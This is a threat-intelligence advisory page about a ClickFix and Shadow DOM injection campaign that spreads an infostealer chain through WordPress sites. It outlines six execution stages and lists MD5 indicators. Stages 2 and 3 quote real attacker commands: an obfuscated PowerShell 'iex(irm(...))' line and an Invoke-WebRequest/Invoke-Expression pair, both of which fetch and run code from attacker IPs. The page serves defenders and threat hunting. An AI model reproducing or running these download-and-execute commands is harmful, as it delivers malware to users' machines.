ClickFix / Shadow DOM JS Injection Campaign — Multi-stage infostealer chain targeting WordPress sites
TLP: WHITE | Author: dispensight | Created: 2026-05-13 | Modified: 2026-05-20
191 IOCs (high volume)
Observed execution flow:

Stage 1: Initial access via the browser (ClickFix lure).

Stage 2: Obfuscated PowerShell execution:

```
Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null
```

Stage 3: Secondary payload download. A child PowerShell process (PID 4908) spawned by PID 7408 executes:

```
Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing
Invoke-Expression $checkResult.Content
```

Stage 4: Code compilation and injection (csc.exe).

Stage 5: Payload execution in svchost.exe, with self-deletion when finished.

Stage 6: Network communication: Suricata IDS detects DonutLoader requesting additional payloads from 158.94.208.104:80.

Detailed description available at https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf
Indicators of Compromise (12 / 191 total)
| Type | Indicator | Description | Created |
|---|---|---|---|
| FileHash-MD5 | 51b46342163ef37f5f41c269ffb337d3 | MD5 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810 | 2026-05-17 |
| FileHash-MD5 | 7c268bfab0653cdca45b4dc3c1ee0092 | MD5 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 | 2026-05-17 |
| FileHash-MD5 | c43c4bfd2e1a44ef690e6801be2b4099 | collected from bryanexhaust.com | 2026-05-18 |
| FileHash-MD5 | f17ba86cd4acff4ecfa2357c3b1d4b2c | | 2026-05-18 |
| FileHash-MD5 | f29926ae72794dde60ae1d57d97c5781 | | 2026-05-19 |
| FileHash-MD5 | ff1d1a915f7a4a1df4a16e0dd2990241 | | 2026-05-19 |